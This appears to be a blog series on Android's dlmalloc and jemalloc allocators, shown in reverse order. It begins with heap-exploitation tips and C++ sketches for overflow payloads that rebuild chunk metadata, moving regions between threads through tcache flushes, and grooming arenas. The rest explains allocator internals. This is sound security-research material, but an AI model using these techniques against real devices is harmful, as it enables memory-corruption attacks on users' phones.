On dlmalloc, freeing a placeholder can cause it to be consolidated with an adjacent free chunk, resulting in it being placed in a larger bin’s free list. It then might not be used for the next allocation of the placeholder size. In other words, the placeholder will not be used to service the gadget or overflowable object allocation.

We can solve this quite easily using pinner allocations. The idea is that you simply allocate objects before your first placeholder and after your last placeholder. You never free these. As these pinners are always in use, and as we only ever free one placeholder in a set at a time, the placeholders will not be consolidated when freed.

Once you finally get your objects to be one after the other, there is an additional gotcha on dlmalloc. The metadata for the gadget chunk will be between your overflowable object and the gadget data. You need to overwrite this metadata with the sizes of the first and second objects respectively. Otherwise the allocator will fail when it comes time to free your chunks.
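
Concretely, on 32-bit dlmalloc the overflow data must reconstruct the two metadata words sitting between the chunks. A sketch, assuming the chunk layout described in Part 1; the flag bit values match the stock dlmalloc source, but verify them against your target’s build:

#include <cstdint>
#include <cstring>
#include <cstddef>

// 32-bit dlmalloc chunk header: two words of inline metadata sitting
// directly before each chunk's user data.
struct dl_header {
    uint32_t prev_foot;  // size of the previous chunk
    uint32_t head;       // this chunk's size, plus the in-use flag bits
};

// In-use bits in the low bits of 'head' (PINUSE_BIT/CINUSE_BIT in the
// stock dlmalloc source).
constexpr uint32_t PINUSE = 0x1;
constexpr uint32_t CINUSE = 0x2;

// Build the overflow payload: our data for the first chunk, then a
// reconstructed header so that free() still sees sane metadata.
size_t build_payload(uint8_t *out, const uint8_t *data,
                     size_t first_chunk_size, size_t second_chunk_size) {
    memcpy(out, data, first_chunk_size);
    dl_header hdr;
    hdr.prev_foot = (uint32_t)first_chunk_size;
    hdr.head      = (uint32_t)second_chunk_size | PINUSE | CINUSE;
    memcpy(out + first_chunk_size, &hdr, sizeof(hdr));
    return first_chunk_size + sizeof(hdr);
    // ...the gadget object data we actually want to corrupt follows.
}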

On jemalloc, the metadata is out-of-band, so this is not necessary.

Another thing to watch out for is that your primitive candidates may cause allocations or frees on threads other than the one which allocates your overflowable and gadget objects. In fact, the overflowable and gadget objects might not be allocated on the same thread at all. So your placeholders might be allocated (and freed) by one thread, but the gadget or overflowable object will be allocated on another.

This shouldn’t present a problem for dlmalloc, but can be a significant pain on jemalloc.

The basic question is: how can we move an allocation from one thread’s tcache to another thread?

One way to do this is to use flush events.

We free our desired placeholder region on the source thread. We then free up to 20 more regions on that same thread. This fills up the tcache, resulting in a flush. The flush removes the oldest half of the tcache and marks those regions as free, making them available for other threads to allocate. We then allocate on our desired thread to get the region we want, with the object content we need.
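
As a sketch (the triggers are hypothetical, and 20 matches the tcache maximum for larger bins described in Part 2):

#include <cstddef>

// Hypothetical triggers, as before. TCACHE_MAX matches the maximum of 20
// entries for larger bins; it is 8 for small bins.
extern void prim_free(void *handle);
extern void trigger_allocation_on_target_thread();

constexpr int TCACHE_MAX = 20;

void migrate_region_between_threads(void *placeholder, void *extras[TCACHE_MAX]) {
    // All frees happen on the source thread.
    prim_free(placeholder);                 // desired region enters the tcache first
    for (int i = 0; i < TCACHE_MAX; i++)
        prim_free(extras[i]);               // overfill the tcache...
    // ...triggering a flush: the oldest half of the tcache, including our
    // placeholder, is really freed and becomes visible to other threads.
    trigger_allocation_on_target_thread();  // the target thread can now grab it
}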

Note that the desired region might not be first in line on the thread which allocates the desired object. You might need to spray a bunch of allocations on that thread in order to catch the freed placeholder. Filling holes before allocating the placeholders can help prevent this issue.

Getting this right can be really complicated and is going to be very specific to your target, your vulnerability and the gadgets and primitives you find.

One thing to remember is that on jemalloc, the regions for your overflowable and gadget objects will be of the same size – the maximum size of this particular bin. This might be larger than the objects themselves, so when you overflow from your overflowable buffer, you need to pad that overflow with the difference between the overflowable object’s size and the bin size before you overflow any gadget object data.
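
In other words, the overflow payload starts with padding out to the bin’s region size. A sketch, where bin_size would be looked up in jemalloc’s size-class table for the target bin:

#include <cstring>
#include <cstdint>
#include <cstddef>

// The overflowable object's region is rounded up to the bin's region size,
// so the gadget object's data starts bin_size bytes into our buffer, not
// sizeof(overflowable object) bytes in.
size_t build_jemalloc_overflow(uint8_t *out, size_t bin_size,
                               const uint8_t *gadget_data, size_t gadget_len) {
    memset(out, 'A', bin_size);                       // our object plus slack padding
    memcpy(out + bin_size, gadget_data, gadget_len);  // now we hit the gadget object
    return bin_size + gadget_len;
}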

On dlmalloc, the objects are directly after one another, except for the metadata between them.

On jemalloc it is possible that the threads that are involved in your exploitation are not assigned to the same arena. This can be problematic if, for example, you need to allocate contiguous regions in different threads.

Arena selection is supposed to use a round-robin approach, but in reality a new thread will always be assigned to the arena with the fewest threads. If you can somehow create and destroy threads before your overflow, you can do the following:

First add a whole bunch of threads to the system, say 30 threads. They will be spread evenly across the two arenas. Now destroy every second thread you created, causing one arena to have 15 threads and the other 0. Now allocate your exploitation threads. Up to 15 of them will be allocated in the same arena.
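
Here is a sketch of that grooming using raw pthreads, assuming the target gives us some way to create and destroy threads; the arena arithmetic in the comments follows the two-arena, least-loaded assignment described above:

#include <pthread.h>
#include <unistd.h>
#include <cstdint>

static volatile int keep_alive[30];

static void *parked(void *arg) {
    int idx = (int)(intptr_t)arg;
    while (keep_alive[idx])      // stay alive (and assigned to an arena)
        usleep(10000);
    return nullptr;              // exiting frees this thread's arena slot
}

void groom_arenas() {
    pthread_t tids[30];
    // Step 1: 30 new threads get spread across the two arenas, 15 each.
    for (int i = 0; i < 30; i++) {
        keep_alive[i] = 1;
        pthread_create(&tids[i], nullptr, parked, (void *)(intptr_t)i);
    }
    // Step 2: destroy every second thread. Since assignment alternated,
    // one arena drops to 0 threads while the other keeps 15.
    for (int i = 0; i < 30; i += 2) {
        keep_alive[i] = 0;
        pthread_join(tids[i], nullptr);
    }
    // Step 3: the next threads created (our exploitation threads) all land
    // in the now-empty arena, up to 15 of them.
}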

That’s about all I’ve got for you guys. I hope that I’ve given you a foundation in understanding how the Android libc allocators work, and that you’ve heard some tips regarding how to successfully exploit heap vulnerabilities on Android.

 

A Tale of Two Mallocs: On Android libc Allocators – Part 2 – jemalloc

In the first post of this series, we discussed why it is important to understand the inner workings of the libc heap allocator, and did a deep dive into the original Android libc allocator: dlmalloc. In this post, we’ll examine the allocator which replaced dlmalloc as Android’s allocator.

The new allocator selected by the bionic developers is called jemalloc. It is named after its implementer, Jason Evans, who started writing jemalloc in 2005. It was then added to FreeBSD’s libc to become that platform’s default allocator. In 2007, the Mozilla Firefox project adopted the standalone version of jemalloc as its primary allocator. Since 2009, jemalloc has been used extensively in Facebook’s backend servers, and it is currently maintained by a team at Facebook.

In May 2014, jemalloc was added to the bionic source tree for Android 5.0.0. dlmalloc continued to be the default, but it was possible to select the new heap implementation using a board config flag. In July 2014, jemalloc was made the default.

In an ideal world, every vendor of an Android phone would have made the transition to jemalloc with their Android 5.0.0 ROMs. Unfortunately, many vendors chose to remain with the tried and tested dlmalloc heap until later versions of Android. In fact, I’ve seen dlmalloc being used on both Lollipop and Marshmallow devices. Because there is no clear line in time separating the two implementations, you cannot really know a priori whether a given Android 5 or 6 device is using dlmalloc or jemalloc.

jemalloc was designed from the ground up to be highly performant in symmetric multi-processing environments. It has many features geared towards increasing efficiency and locality in multi-threaded apps, while reducing overall fragmentation.

The first important concept in jemalloc’s implementation is the arena. Each thread is assigned to a given arena, and it allocates and frees only from that arena. Each arena is completely separate from the other arenas, and, most importantly, each has its own mutexes guarding its data structures. This means that you can actually perform allocator operations in parallel, so long as the threads involved are assigned to different arenas.

In general jemalloc usage, there should be slightly more arenas than there are hardware cores. For some reason, on Android, this is not the case: there are exactly two arenas.

Threads are assigned to arenas in a round-robin fashion, which should ensure that the arenas have a more or less equal number of threads.

In jemalloc, memory is allocated from the operating system using mmap. Each mmap operation allocates a chunk. jemalloc chunks roughly correlate to dlmalloc segments. Chunks are all of the same size: 256kB on Android versions up to 7.0.0; from 7.0.0, they are 512kB for 32-bit processes and 2MB for 64-bit processes. Each chunk belongs to a specific arena. There is a chunk header containing metadata for the chunk, notably including a pagemap which defines which pages are associated with which runs.

For any jemalloc-managed address, the relevant chunk header can easily be found by simply rounding the address down to the chunk size. This means that we have O(1) lookup of metadata in most situations.
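
For example, assuming the pre-7.0.0 chunk size of 256kB:

#include <cstdint>

constexpr uintptr_t CHUNK_SIZE = 256 * 1024;  // 256kB on Android < 7.0.0

// Any jemalloc-managed address maps to its chunk header by rounding down
// to the chunk-size boundary -- an O(1) mask, no lookup tables needed.
static inline void *chunk_header_for(void *region) {
    return (void *)((uintptr_t)region & ~(CHUNK_SIZE - 1));
}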

A run is an area of contiguous memory, located in a chunk. Each run contains a fixed number of regions of a specific size. Different size classes have different numbers of regions. Runs are always a multiple of the page size. Run metadata is stored in the chunk header for the chunk which contains them. In other words, the metadata is out-of-band. Each run has a bitmap which indicates the state of each region in the run. A region can either be in-use or free.

Regions are the smallest unit of the jemalloc system. These are analogous to dlmalloc chunks, except that regions do not carry any metadata at all. Instead each region belongs to a run of regions of the same size. The run stores the metadata for all its regions in the chunk’s header. The region address is the return value from a malloc call, and should be the argument to free.

jemalloc is, at its core, a bucket allocator. Each arena has a set of logical bins, each of which services a specific size class. Allocations are made from the bin with the smallest size large enough to fit the allocation request. On Android, there are 39 bins. By having a carefully selected and limited list of bin sizes, with small steps between them, fragmentation can be decreased.

Note that on dlmalloc, bins are used only as free lists. On jemalloc, bins are used for ALL allocations.

Bin metadata is stored in the arena structure. Each run is associated with a specific bin. Each bin has a ‘current’ run which points to the non-full run from which it is currently allocating. Here you can see the 39 bins for this arena, with their metadata addresses, size classes and current run pointers.

If a run becomes full during an allocation, jemalloc will check whether there are any non-full runs for this bin in the arena. If more than one non-full run exists, the one with the lowest address will be selected and set as the ‘current’ run. If no non-full run is available in this bin, a new run will be created in either an existing chunk or a new chunk, and that run will be set as the ‘current’ run of the bin.

Arenas keep track of their non-full runs and available chunk space using a set of red-black trees. Finding a non-full run or available space for a new run is thus at most an O(log(n)) operation.

jemalloc reduces lock contention in a few ways, thereby improving multi-threaded performance. Firstly, each arena has its own locks, so operations on different arenas do not contend for locks. Secondly, the time spent holding a lock is very short: the lock only needs to be held when allocating new runs to a given bin, or when flipping the in-use bit of a region in a run. These mechanisms already make jemalloc significantly more thread-friendly than dlmalloc. However, Jason didn’t stop there. He also implemented thread-specific caches.

For each thread, for each bin there is a tcache. The tcache is a list of recently freed regions for the specific bin and thread.

When allocating, jemalloc first looks to see if there is a region in the tcache for the required size’s bin before going to the ‘current’ run for that bin. If so, it uses that region.

When freeing a region, jemalloc pushes the region onto the tcache for the relevant bin. The tcache is LIFO.

Regions which are currently held in tcaches do not have their in-use bit set to free. Instead they are considered by the greater jemalloc system to be in-use. This saves on locks, as it is only necessary to grab a lock when updating global data structures. Thread specific data structures are by definition safe from other threads, and thus in many cases jemalloc allocations will not grab locks at all.

If jemalloc tries to allocate a region of a given size, and the thread’s tcache for that bin size is empty, a pre-fill event will occur. When prefilling, jemalloc will lock the arena mutex, ‘allocate’ a number of regions for this bin from the ‘current’ run, marking their bits in the run’s bitmaps as in-use, push these regions onto the thread’s tcache and release the lock. This ensures that there are always a ‘sane’ number of regions in a tcache, and significantly improves locality, as a given thread will allocate regions of the same size from mostly contiguous memory.

Each tcache has a maximum number of regions which it can contain. For small bins this is 8, and for larger bins this is 20. When we reach this maximum a flush event occurs. At a flush event, jemalloc takes the oldest half of the tcache’s regions and really frees them. I.e. it grabs the lock and marks the region’s bits as free. At this point they are free to be allocated by other threads.

In addition, jemalloc implements a ‘garbage collection’ mechanism. Essentially, jemalloc counts each allocation and free event. When that count reaches a certain threshold, a so-called ‘hard event’ occurs. At each ‘hard event’, jemalloc looks at a specific bin across all threads, and clears out three-quarters of the regions from the tcaches for that bin. During the next ‘hard event’, the next bin is targeted for cleanup. This is another way that regions can be removed from tcaches and returned to general availability.

So when allocating on jemalloc, we observe the following flow (sketched in code after the list).

  • We first calculate the bin for our request size
  • We then look in the tcache of the current thread for the calculated bin
  • If the tcache is empty, we prefill from the bin’s ‘current’ run
  • When the current run is exhausted, we prefill from the non-full run with the lowest address
  • If there are not enough regions in the existing non-full runs, a new run will be allocated in a chunk which has available space
  • If no space is available in a chunk, a new chunk is allocated from the system, and a new run is allocated in that chunk and is used to prefill the tcache.
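
A condensed sketch of that flow; none of the helper names below are real jemalloc symbols, they just mirror the steps above:

#include <cstddef>

// Pseudocode-level sketch of the jemalloc allocation path described above.
extern int   bin_for_size(size_t size);
extern void *tcache_pop(int bin);                 // nullptr if the tcache is empty
extern bool  current_run_exhausted(int bin);
extern void  select_lowest_nonfull_run(int bin);  // or carve a new run/chunk
extern void  tcache_prefill_from_run(int bin);    // takes the arena lock

void *je_malloc_sketch(size_t size) {
    int bin = bin_for_size(size);          // 1. size class -> bin
    void *r = tcache_pop(bin);             // 2. thread-local cache first
    if (r) return r;                       //    common case: no lock taken
    if (current_run_exhausted(bin))        // 4-6. find or create a usable run
        select_lowest_nonfull_run(bin);
    tcache_prefill_from_run(bin);          // 3. prefill under the arena lock
    return tcache_pop(bin);
}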

So now we’ve covered the essential details of jemalloc.

Let’s compare some of the important properties of dlmalloc and jemalloc.

  • dlmalloc is a best-fit allocator while jemalloc is a bucket allocator
  • dlmalloc uses in-line metadata, while jemalloc’s metadata is out-of-band
  • user allocations on dlmalloc are called chunks, in jemalloc they’re called regions
  • dlmalloc allocates variable sized segments from the system, while jemalloc allocates fixed-sized chunks
  • jemalloc always allocates from fixed-size regions, while dlmalloc chunks can be any 8-byte-aligned size
  • In dlmalloc, adjacent allocations are usually not the same size. In jemalloc they are.
  • dlmalloc only has the big lock, jemalloc has fine grained mutexes which reduce lock contention
  • jemalloc has thread specific free lists (aka tcaches) to further increase multithreading performance
  • jemalloc has a garbage collection mechanism which helps to clean up tcaches.
  • Recently freed chunks or regions on dlmalloc are reused in a FIFO fashion, while on jemalloc they are reused LIFO.

We estimate that the current distribution of devices in use is about 70% jemalloc and 30% dlmalloc. This is largely because most people update their phones relatively frequently, skewing the distribution towards the more modern jemalloc-based systems. Even though the bulk of devices are on jemalloc, it is still necessary to exploit dlmalloc devices in order to get good real-world coverage. For example, certain geographical regions are more likely to have dlmalloc-based phones.

A Tale of Two Mallocs: On Android libc Allocators – Part 1 – dlmalloc

In this series of three posts, we’re going to try to cover a deep dive into the pertinent details of the two Android libc allocators, followed by some thoughts on exploitation in light of those allocators.

All of the information I’ll impart is the result of our own research into the allocators in question, including a thorough code review of the implementations of those allocators. That said, much of the information is available online in one form or another. I’ve yet to encounter a concise but in-depth description of both allocators and the relevant exploitation techniques. Hopefully that’s what this presentation will provide.

It’s 2018. The days of trivially exploitable stack buffer overflows are over. Modern exploitable vulnerabilities fall into a few narrow classes; we’ll focus on two of these.

Even at this late stage in the game, memory corruption bugs are still a thing. Chief among these is the good old buffer overflow. Stack cookies have largely neutered the exploitability of stack-based memory corruption, so most modern memory corruption vulnerabilities are in objects and buffers on the heap.

In addition to these heap-based memory corruption vulnerabilities, we have use-after-free vulnerabilities.

This class of bugs is all about heap objects coupled with bad memory management practices.

Together these two classes make up a very large portion of the exploitable bugs we find in modern software.

What these classes of bugs have in common is that they both occur mostly in heap objects. Understanding how the heap works is a critical, often overlooked, step in crafting reliable exploits for these kinds of vulnerabilities.

Other prevalent classes of bugs are type confusions and race conditions. We’re not going to focus on those here, because they are not necessarily heap-related.

When we talk about the ‘heap’, what we usually mean is any and all memory objects which are managed using the libc malloc/free interface. This very simple interface lets us allocate so-called “dynamic memory” for our use, and free it when we are done using it. When we approach the task of exploiting a heap-overflow or a use-after-free, it’s not enough to know the semantics of this interface. We need to know what is happening under the hood.

Android uses its own libc implementation, called bionic. When the Android developers came to implement these heap functions, they wisely chose to use an existing, battle tested implementation instead of rolling their own.

dlmalloc

The dynamic memory allocator implementation they chose is called dlmalloc. It’s named after its author, Doug Lea. Doug started writing this allocator way back in 1987. It has received many updates and improvements over the years, and was last updated in 2012.

When you call malloc, dlmalloc does a bunch of stuff behind the scenes, and will eventually return a pointer to a block of contiguous memory which you can use in your program. This block is called a ‘chunk’, and is guaranteed to be at least as big as the size you requested.

These chunks don’t come from nowhere. When dlmalloc needs memory to use for chunks, it requests an allocation from the operating system. Each such system allocation is called a ‘segment’.

Segments are the base unit of allocation from the OS. dlmalloc keeps a linked list of segments it has allocated from the system, with the pointers stored in the segment’s footer. The most recently allocated segment is the ‘current’ segment. When it needs more system memory, dlmalloc first tries to extend the current segment using sbrk, falling back to mmap-ing a new segment if that doesn’t work. Segments can be of different sizes, but are always a multiple of the page size. Segments are not guaranteed to be adjacent to one another in memory, and, in fact, are allocated at random addresses when system-wide ASLR is enabled, as it is on Android. If a new segment happens to be contiguous to an existing segment, the two segments are consolidated into a single larger segment.

The current segment contains the ‘top chunk’, which is the chunk of free space available for immediate allocation of chunks. Here’s an example ‘current’ segment, with in use (allocated) chunks in light green and free (unallocated) chunks in blue.

When dlmalloc needs to allocate a new chunk for a malloc call, it will check if the top chunk is big enough to contain the new chunk, and will carve the new chunk from within the top chunk by splitting it. The first half of the top chunk becomes the new chunk to be returned, and the second half becomes the new ‘top chunk’. If the ‘top chunk’ is not large enough to contain the new chunk, a new segment is allocated from the operating system, and the new chunk is allocated from that new segment.

Each chunk has two pointers’ worth of metadata: in 32-bit processes, this is 8 bytes. This metadata sits directly before the pointer returned by malloc, i.e. inline, before the usable memory. The minimum amount of actual usable memory returned by malloc is two pointers wide.

Chunks of different sizes can be allocated one after the other in the segments. Each chunk marks its size and whether it is in use or not, via the C_INUSE flag. It also marks whether the previous chunk in the segment is in use, with the P_INUSE flag, and the previous chunk’s size. Because the metadata contains the size of the previous chunk, we can easily walk backwards through the chunks in a segment.
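
The in-line metadata looks roughly like this in a 32-bit process. The layout follows the stock dlmalloc source (the free-list pointers are discussed below); as always, verify field sizes against your target’s build:

#include <cstdint>

// In-line dlmalloc chunk metadata, 32-bit layout. The two metadata words
// sit immediately before the pointer that malloc returns.
struct malloc_chunk {
    uint32_t prev_foot;          // size of the previous chunk (valid when it is free)
    uint32_t head;               // this chunk's size | C_INUSE | P_INUSE flag bits
    // User data starts here. For free chunks, dlmalloc reuses this space
    // for the bin's doubly-linked free list:
    struct malloc_chunk *fd;     // next chunk in this bin's free list
    struct malloc_chunk *bk;     // previous chunk in this bin's free list
};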

When you call free on a given chunk, the first thing that happens is that dlmalloc checks to see if the preceding chunk is in use. If the preceding chunk is free, dlmalloc will consolidate the two chunks into one larger free chunk.

This means that it is impossible for two consecutive chunks in a segment to both be free. The chunks immediately before and after a free chunk are both guaranteed to be in use.

Simple, right? Obviously what we’ve described is a pretty naïve allocator implementation. There’s a little more to it. Specifically, what we’ve described is a system which never reuses freed memory, as it always allocates from the ‘top chunk’. So how do we efficiently reuse freed memory?

We need some bins.

Bins are used to keep a record of recently freed chunks which can be reused. There are two types of bins: ‘small’ and ‘tree’. Small bins are used for chunks smaller than 0x100 bytes. Each small bin contains chunks of the same size. Tree bins are used for larger chunks, and contain chunks of a given range of sizes. Small bins are implemented as simple doubly-linked lists, and tree bins are implemented as bitwise digital trees (aka ‘tries’), keyed on chunk size. There are 32 small bins and 32 tree bins.

When a chunk is freed, it undergoes consolidation if needed, and then the consolidated chunk is added to the appropriate bin for its size. The list and tree node pointers are stored within the actual chunk data, which is safe to use for metadata as it is ‘free’. This is where the minimum size for a chunk comes from: we need space for previous and next pointers in the free chunk’s data.

Here’s an example showing a few segments with some in use and free chunks. The 0x18 bin points to the first of the free chunks of size 0x18, and the rest of them are chained together in a doubly-linked-list.

Note that small bins contain chunks of exactly one size. Tree bins contain ranges of chunk sizes.

dlmalloc is a best-fit allocator. It will always try to find the free chunk with the smallest size greater than or equal to the request size.

During allocation, before looking at the ‘top chunk’, dlmalloc will first try to find a free chunk in the bins. It first tries to find a chunk which matches the exact size of the allocation request, and then moves upwards through the non-empty bins till it finds the smallest chunk which is larger than the request. If a larger chunk is used, it will be split, and the remainder will be added to the relevant bin to possibly be used for future allocations. Only if no chunk exists in the bins to satisfy the allocation request will the ‘top chunk’ be used.

Note that the bins are First In First Out. So chunks are allocated in the order that they were freed. This can be an important factor in exploitation.

After looking in the bins for an exact size match, but before going to the ‘top chunk’, dlmalloc will try to see if the ‘designated victim’ is large enough to contain the allocation request.

The ‘designated victim’ is the preferred chunk for servicing small requests that don’t have an exact fit. It is the chunk which was most recently split off. It doesn’t sit in any bin. Having the ‘designated victim’ helps to localize allocations to a given memory segment, which can be useful when considering how CPU caches work. Small allocations which don’t have an exact fit in the bins will be split off from this chunk.

So for a small allocation, meaning a request smaller than 0x100 bytes, this is the flow (sketched in code after the list):

  • We first calculate the exact size including metadata and padding
  • We then look for an exact match in the small bins
  • If that fails, we next see if the ‘designated victim’ is large enough to allocate from
  • If the ‘designated victim’ is too small, we then look for a ‘best fit’ in the small bins larger than our request size
  • If that fails, we look in the tree bins for a ‘best fit’ match
  • Finally, if all else has failed, we look at the top chunk, potentially causing more memory to be allocated from the system.
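
And the same flow as a condensed sketch; the helper names are ours, not dlmalloc’s internal identifiers, and each one stands for the corresponding step above:

#include <cstddef>

// Pseudocode-level sketch of dlmalloc's small-request path described above.
extern size_t pad_request(size_t size);              // add metadata and padding
extern void  *smallbin_exact(size_t size);           // nullptr if bin is empty
extern void  *split_designated_victim(size_t size);  // nullptr if dv is too small
extern void  *smallbin_best_fit(size_t size);        // smallest larger small bin
extern void  *treebin_best_fit(size_t size);
extern void  *split_top_chunk(size_t size);          // may grow the segment

void *dl_malloc_small_sketch(size_t req) {
    size_t size = pad_request(req);
    void *p;
    if ((p = smallbin_exact(size)))          return p;  // exact-size small bin
    if ((p = split_designated_victim(size))) return p;  // designated victim
    if ((p = smallbin_best_fit(size)))       return p;  // larger small bins
    if ((p = treebin_best_fit(size)))        return p;  // tree bins
    return split_top_chunk(size);                       // top chunk / new segment
}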

Larger allocations are a little simpler. We just try to allocate from the tree bins before attempting the ‘designated victim’ and then the top chunk.

There are no bins for so-called very large allocations, meaning anything larger than the MMAP_THRESHOLD, which is 64kB on Android. These allocations don’t come from the segments. Instead, each such allocation is mmaped directly.

So that’s dlmalloc in a nutshell. Hopefully I’ve covered all the salient points. There are a couple of things we should note before moving on.

While dlmalloc takes some steps to reduce fragmentation of the heap, particularly the reuse of freed chunks based on bin size, it is still common for smaller free chunks to become trapped between larger consecutive chunks which often remain in use for longer periods in application flow.

dlmalloc is not thread safe. At all. Both malloc and free touch process-global data structures, as well as the inline metadata between chunks and inside free chunks. Remember that dlmalloc was designed long before the Age of Parallelism, before every application was multithreaded, before hyper-threading and multi-core processors. To make dlmalloc usable in multi-threaded processes, Doug Lea chose the simplest possible fix: the big lock.

Every single malloc or free call locks a global mutex on entry and unlocks it at function exit. This makes dlmalloc usable with threads, but has a major performance impact: essentially all allocator operations are serialized. This is OK in lightly multi-threaded processes, but can be a significant drag on more complex applications.

The poor multithreading performance of dlmalloc is one of the main reasons that the bionic developers decided to switch to a more modern heap implementation.

That wraps up the discussion of dlmalloc. Read the next post in this series to find out about jemalloc, the more modern Android libc allocator.